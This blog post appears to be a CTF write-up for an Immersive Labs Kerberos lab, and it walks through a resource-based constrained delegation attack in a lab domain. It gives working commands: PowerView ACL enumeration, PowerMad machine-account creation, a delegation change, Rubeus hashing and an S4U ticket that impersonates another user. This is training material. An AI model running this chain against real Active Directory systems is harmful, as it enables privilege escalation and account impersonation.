Post

IML - Kerberos: Ep.11 – Active Directory Certificate Services

Kerberos Ep.11 – Resource-Based Constrained Delegation (RBCD) - A walkthrough of the challenge with enumeration, exploitation and privilege escalation steps.

Posted Updated
By Trompie
1 min read

IML - Kerberos: Ep.12 – Active Directory Certificate Services

IML - Kerberos: Ep.11 – Resource-Based Constrained Delegation (RBCD)

image1

  • RDP:
1
2

xfreerdp /v:10.102.81.46 /u:s.villanelle /p:Summ3r2021! /d:krbtown +clipboard +drives /drive:root,/home/kali /dynamic-resolution

image2

image3

  • Enumeration:
1
2
3
4

. .\PowerView.ps1

get-domainuser s.villanelle -properties objectsid | select -exp objectsid

image4

  • Then, use the SID to enumerate what rights you have over Workstation-02 by running the command:
1
2
3
4

get-domainobjectacl workstation-02 | ?{$_.SecurityIdentifier -eq "[USER_SID]"}

get-domainobjectacl workstation-02 | ?{$_.SecurityIdentifier -eq "S-1-5-21-2984655098-284417223-3543700247-1121"}

image5

image6

image7

image8

  • Open Elevated Powershell:
1
2
3
4

. .\Powerview.ps1

Get-DomainObject -Identity "dc=krbtown,dc=local" -Domain krbtown.local

image9

image10

image11

image12

image13

  • Open Elevated Powershell
1
2
3
4

. .\Powerview.ps1

Get-NetComputer Workstation-02 | Select-Object -Property name, msDS-AllowedToActOnBehalfOfOtherIdentity

image14

image15

  • Open Elevated Powershell:
1
2

. ./PowerMad.ps1

New-MachineAccount -MachineAccount <ANY_MACHINE_NAME> -Password $(ConvertTo-SecureString ‘<RANDOM_PASSWORD>’ -AsPlainText -Force) -Verbose

Give the machine a name of your choice and a password that meets the password policy

1
2

New-MachineAccount -MachineAccount terminator -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force) -Verbose

image16

image17

Set-ADComputer workstation-02 -PrincipalsAllowedToDelegateToAccount <NEW_MACHINE_NAME>$

1
2

Set-ADComputer workstation-02 -PrincipalsAllowedToDelegateToAccount terminator$

image18

  • Open Elevated Powershell:
1
2
3
4

. .\Powerview.ps1

Get-ADComputer workstation-02 -Properties PrincipalsAllowedToDelegateToAccount

image19

image20

image21

  • Open Elevated Powershell:

.\Rubeus.exe hash /password:<PASSWORD_OF_NEW_MACHINE> /user:<NEW_MACHINE_USERNAME>$ /domain:krbtown.local

1
2

.\Rubeus.exe hash /password:Password123 /user:terminator$ /domain:krbtown.local

image22

image23

rubeus s4u /user:<NEW_MACHINE_USERNAME>$ /rc4:<NEW_MACHINE_HASH> /impersonateuser:a.belridge /domain:krbtown.local /msdsspn:cifs/workstation-02.krbtown.local /ptt

1
2

.\Rubeus.exe s4u /user:terminator$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:a.belridge /domain:krbtown.local /msdsspn:cifs/workstation-02.krbtown.local /ptt

image24

image25

  • Check with: klist

image26

image27

image28

image29

CTF, ImmersiveLabs
kerberos powershell privilege escalation rce
This post is licensed under CC BY 4.0 by the author.